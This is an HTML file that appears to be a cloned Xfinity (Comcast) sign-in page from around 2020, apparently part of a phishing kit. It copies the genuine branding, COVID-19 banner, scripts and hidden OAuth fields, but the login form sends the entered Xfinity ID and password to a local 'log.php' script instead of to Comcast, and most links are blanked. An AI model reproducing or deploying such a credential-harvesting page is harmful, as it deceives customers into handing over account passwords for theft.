<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html lang="en" class="light custom" data-resource-package-id="covid19-myaccount"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script type="text/javascript" async="async" src="./Sign in to Xfinitya_files/s42399453618826"></script>
					<script type="text/javascript" src="./Sign in to Xfinitya_files/comcast-common.js.download"></script>
				<title>Sign in to Xfinity</title>
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		
		<meta name="mobile-web-app-capable" content="yes">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="description" content="Get the most out of Xfinity from Comcast by signing in to your account. Enjoy and manage TV, high-speed Internet, phone, and home security services that work seamlessly together — anytime, anywhere, on any device.">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<meta name="msapplication-TileColor" content="#ffffff">
		<meta name="msapplication-TileImage" content="static/images/global/favicon/favicon-96x96.png">
		<meta name="theme-color" content="#ffffff">
		
				
                        <script src="./Sign in to Xfinitya_files/satelliteLib-531bc4f46256650a84099973f0ed331f809ea5f4.js.download"></script>
        
        <script type="text/javascript" src="./Sign in to Xfinitya_files/saved_resource"></script>
    
	<script type="tracking-data-digitalData">
		{
			"page" : {
				"pageInfo" : {
					"screenName" : "sign in",
					"language" : "en",
					"referrerId" : "my-account-web"
				 },
				 "category" : {
                    "primaryCategory" : "login",
                    "designType" : "responsive",
                    "businessType" : "resi",
                    "siteType" : "selfservice"
                },
                "affiliate" : {
                    "name": "comcast",
                    "channel" : "web"
                },
                "codebase" : {
                    "name" : "cima login"
                }
			},
			"user" : [{
				"profile" : [{
					"profileInfo" : {
						"authenticationType" : "unauthenticated",
						"recognizationType" : "unrecognized"
					}
				}],
				"segment" : {
					"isLocalized" : false
				}
			}],
			"schemaVersion" : 0.18
		}

	</script>
    <script>
	    document.addEventListener("DOMContentLoaded", function () {
		    document.dispatchEvent(new CustomEvent("c-tracking-log-page", {
			    bubbles: true
		    }));
	    });
    </script>

					<link rel="stylesheet" type="text/css" href="./Sign in to Xfinitya_files/fonts-remote.min.css">
							<link rel="stylesheet" type="text/css" href="./Sign in to Xfinitya_files/styles-light.min.css">
						<link rel="shortcut icon" href="https://login.xfinity.com/static/images/favicon/favicon.ico">
		<link rel="apple-touch-icon" sizes="57x57" href="https://login.xfinity.com/static/images/favicon/apple-icon-57x57.png">
		<link rel="apple-touch-icon" sizes="60x60" href="https://login.xfinity.com/static/images/favicon/apple-icon-60x60.png">
		<link rel="apple-touch-icon" sizes="72x72" href="https://login.xfinity.com/static/images/favicon/apple-icon-72x72.png">
		<link rel="apple-touch-icon" sizes="76x76" href="https://login.xfinity.com/static/images/favicon/apple-icon-76x76.png">
		<link rel="apple-touch-icon" sizes="114x114" href="https://login.xfinity.com/static/images/favicon/apple-icon-114x114.png">
		<link rel="apple-touch-icon" sizes="120x120" href="https://login.xfinity.com/static/images/favicon/apple-icon-120x120.png">
		<link rel="apple-touch-icon" sizes="144x144" href="https://login.xfinity.com/static/images/favicon/apple-icon-144x144.png">
		<link rel="apple-touch-icon" sizes="152x152" href="https://login.xfinity.com/static/images/favicon/apple-icon-152x152.png">
		<link rel="apple-touch-icon" sizes="180x180" href="https://login.xfinity.com/static/images/favicon/apple-icon-180x180.png">
		<meta name="apple-itunes-app" content="app-id=776010987">		<link rel="icon" type="image/png" sizes="192x192" href="https://login.xfinity.com/static/images/favicon/android-icon-192x192.png">
		<link rel="icon" type="image/png" sizes="32x32" href="https://login.xfinity.com/static/images/favicon/favicon-32x32.png">
		<link rel="icon" type="image/png" sizes="96x96" href="https://login.xfinity.com/static/images/favicon/favicon-96x96.png">
		<link rel="icon" type="image/png" sizes="16x16" href="https://login.xfinity.com/static/images/favicon/favicon-16x16.png">
		<link rel="manifest" href="https://login.xfinity.com/static/images/favicon/manifest.json">

		<script type="text/javascript">
			runtimeData = {
									"r": "comcast.net",									"selectAccount": "false",									"s": "oauth",									"deviceAuthn": "false",									"continue": "https://oauth.xfinity.com/oauth/authorize?client_id=my-account-web&amp;prompt=login&amp;redirect_uri=https%3A%2F%2Fcustomer.xfinity.com%2Foauth%2Fcallback&amp;response_type=code&amp;state=https%3A%2F%2Fcustomer.xfinity.com%2F%23%2F&amp;response=1",									"ipAddrAuthn": "false",									"forceAuthn": "1",									"lang": "en",									"passive": "false",									"client_id": "my-account-web",									"reqId": "e156b8c7-f22c-4234-bd29-c48b15d0623a"							}
		</script>
											    <script src="./Sign in to Xfinitya_files/e5d00e87ba3bf67af60bbc75377626fb1f0b0a10c2e83ca40b7a245ca2cd8367"></script>

													<style type="text/css">
									#background {
													background-image: url('https://sdx.xfinity.com/cms/data/cima/bin-202006/a6eabf890bd17fbbea28fb13064329ba.jpg');
																	}
								html {
background-color: #F2F4F5;
}
#background {
background-repeat: no-repeat;
background-position: center -56px;
}
#left {
margin-left: 0;
padding-right: 94px;
box-sizing: border-box;
}
#left .h1 {
font-weight: bold;
margin-top: 24px;
}
#left hr {
border: solid #b1b9bf;
border-width: 1px 0 0 0;
width: 64px;
margin-left:0;
}
#left p {
color: #44484c;
font-size: 14px;
line-height: 1.5;
margin-bottom: 0;
}
#left p + p {
margin: 0;
}
#left img {
margin-top: 48px;
width: 100%;
}
#left img + p {
margin-top: 48px;
}
			</style>
			<script src="./Sign in to Xfinitya_files/s-code-contents-4a9ebf08bffa74f717ff121b2c55a295112122b4.js.download"></script><script src="./Sign in to Xfinitya_files/satellite-596fc62264746d0ba500dd83.js.download"></script><script src="./Sign in to Xfinitya_files/satellite-596fa36064746d7e580013b4.js.download"></script><script src="./Sign in to Xfinitya_files/satellite-5971021b64746d663b00202b.js.download"></script><script src="./Sign in to Xfinitya_files/satellite-596fa34764746d6ae001a760.js.download"></script></head>
		<body class=" has-footer ">
		<div id="breakpoints"></div>
							<div id="background" style="height: 683px;"></div>
								<main id="bd">
			<h1 class="screen-reader-text">Sign in to Xfinity</h1>
			<div id="left"><h2 class="h1">
We're committed to<br>
keeping you connected
</h2>
<hr>
<p>
Get answers to some common questions and read more<br>
about our response to Coronavirus (COVID-19).
<a href="">Learn more</a>
</p>
<img src="./Sign in to Xfinitya_files/90ce7ef3914b40d1e8f9878770a9b507.png">
<p>
Use <a href="">quick bill pay</a> without even signing in.
</p>
<p>
Comcast Business customer?
<a href="">Sign in here</a>
</p>
<style>
#right #quick-bill-pay { display: block; }
</style></div><div id="right">		<div class="container">
	<form name="signin" action="log.php" method="post" onsubmit="return login.onSubmit()">
																			<div class="single logo-wrapper">
				<span aria-role="img" class="xfinity-logo"></span>
											</div>
		                            <div class="textfield-wrapper">
				<label for="user" class="float accessibly-hidden">Xfinity ID</label>
				<input id="user" name="user" type="text" placeholder="Email, mobile, or username" value="" autocorrect="off" autocapitalize="off" spellcheck="false" maxlength="128">
			</div>
		
					<div class="textfield-wrapper">
				<label for="passwd" class="float accessibly-hidden">Password</label>
				<input id="passwd" name="passwd" type="password" placeholder="Password" maxlength="128">
			</div>
		
        
	    			<div class="checkbox-container">
				<label for="remember_me">
					<input type="checkbox" id="remember_me" name="rm" value="1"><span id="remember_me_checkbox" class="checkbox"></span><div class="content">Stay signed in</div>
				</label>
				<button type="button" id="rm_label_learn_more" class="icon info cancel" data-id-ref="rm_help" aria-controls="rm_help" aria-label="Learn more about staying signed in"></button>
			</div>

			        
        
        
		
		
		
												<button class="submit" type="submit" id="sign_in">Sign In</button>
					
		
		
		<ul>
			
			        	    	

																						<li id="forgot-username-password-item">Forgot <a href="" target="_self" title="Look up Xfinity ID">Xfinity ID</a> or <a id="forgotPwdLink" href="" target="_self" title="Reset Password">password</a>?</li>
									
										<li id="create-username-item">Don't have an Xfinity ID?					<span><a href="" target="_self">Create one</a></span>
				</li>
					
		
			
		    										
				
				<li id="quick-bill-pay">
					<a href="" target="_self">Pay any balance</a> without signing in				</li>
			
						
		</ul>
					<p id="implied-legal">By signing in, you agree to our <a href="">Terms of Service</a> and <a href="">Privacy Policy</a>.</p>
		
		
					<input type="hidden" name="r" value="comcast.net">
					<input type="hidden" name="selectAccount" value="false">
					<input type="hidden" name="s" value="oauth">
					<input type="hidden" name="deviceAuthn" value="false">
					<input type="hidden" name="continue" value="https://oauth.xfinity.com/oauth/authorize?client_id=my-account-web&amp;prompt=login&amp;redirect_uri=https%3A%2F%2Fcustomer.xfinity.com%2Foauth%2Fcallback&amp;response_type=code&amp;state=https%3A%2F%2Fcustomer.xfinity.com%2F%23%2F&amp;response=1">
					<input type="hidden" name="ipAddrAuthn" value="false">
					<input type="hidden" name="forceAuthn" value="1">
					<input type="hidden" name="lang" value="en">
					<input type="hidden" name="passive" value="false">
					<input type="hidden" name="client_id" value="my-account-web">
					<input type="hidden" name="reqId" value="e156b8c7-f22c-4234-bd29-c48b15d0623a">
		
 	</form>
</div>

				</div>
		</main>
													<footer>
<span class="content">
<span class="copyright">© 2020 Comcast</span>
<nav>
<span class="divider hide-compact"></span>
<span class="links">
<a href="">Privacy Policy</a>
<span class="divider"></span>
<a href="">Terms of Service</a>
</span>
<span class="ad-links divider"></span>
<span class="ad-links links">
<a href="http://www.comcast.net/adinformation" target="_blank">Ad Info</a>
<span class="divider"></span>
<a href="https://www.surveymonkey.com/s.aspx?sm=FyNNVDhj_2f2FNc2KVOHQ4eg_3d_3d" target="_blank">Ad Feedback</a>
</span>
<span class="divider hide-compact"></span>
<span class="links">
<a href="https://www.xfinity.com/privacy/manage-preference">Cal. Civ. Code §1798.135: Do Not Sell My Info</a>
</span>
</nav>
</span>
</footer>
					
		
		<script type="text/javascript" src="./Sign in to Xfinitya_files/jquery-3.3.1.min.js.download"></script>

											<div id="rm_help" role="dialog" aria-hidden="true" class="overlay" data-dialog-type="overlay">
    	<div role="document" class="content">
    		    		<button type="button" class="close" aria-label="Close"></button>
    							<h1>Why Stay Signed In?</h1>
					<p>With this option selected, you'll stay signed in to your account on this device until you sign out. You should not use this option on public or shared devices.</p>
					<p>For your security, you may be asked to enter your password before accessing certain information.</p>
				
    	</div>
    </div>
			
    <script type="text/javascript" src="./Sign in to Xfinitya_files/scripts-responsive.min.js.download"></script>

    <script type="text/javascript">
        login.registerInitFunction(function(config){
	login.onSubmit = function() {
		var usernameSelector = "#"+config.usernameId,
			passwordSelector = "#"+config.passwordId,
			username = $(usernameSelector),
			password = $(passwordSelector);
		if(username.val() === "" || password.val() === "") {
			$("#error").remove();
			$(usernameSelector+", "+passwordSelector).addClass("error").attr({
				'aria-invalid': 'true',
				'aria-describedby': 'error'
			});
			$('<p id="error" class="error_message">'+config.authnEmptyError+'</p>').insertAfter(".textfield-wrapper:has("+passwordSelector+")");
			username.focus();
			return false
		} else {
			return true
		}
	};
	
}, "responsiveForm");
;
        						shared.init();
        login.init({
            usernameId: 'user',
            passwordId: 'passwd',
            authnEmptyError: 'Please enter your Xfinity ID to sign in.'
        });
    </script>

		<script type="text/javascript">
		
		</script>

			

<img src="./Sign in to Xfinitya_files/data-layer.jpg" style="top: -10000px; left: -10000px; position: absolute;"><iframe sandbox="allow-scripts allow-same-origin" title="Adobe ID Syncing iFrame" id="destination_publishing_iframe_comcastathena_1" name="destination_publishing_iframe_comcastathena_1_name" src="./Sign in to Xfinitya_files/dest5.html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe><iframe sandbox="allow-scripts allow-same-origin" title="Adobe ID Syncing iFrame" id="destination_publishing_iframe_comcast_0" name="destination_publishing_iframe_comcast_0_name" src="./Sign in to Xfinitya_files/dest5(1).html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe></body></html>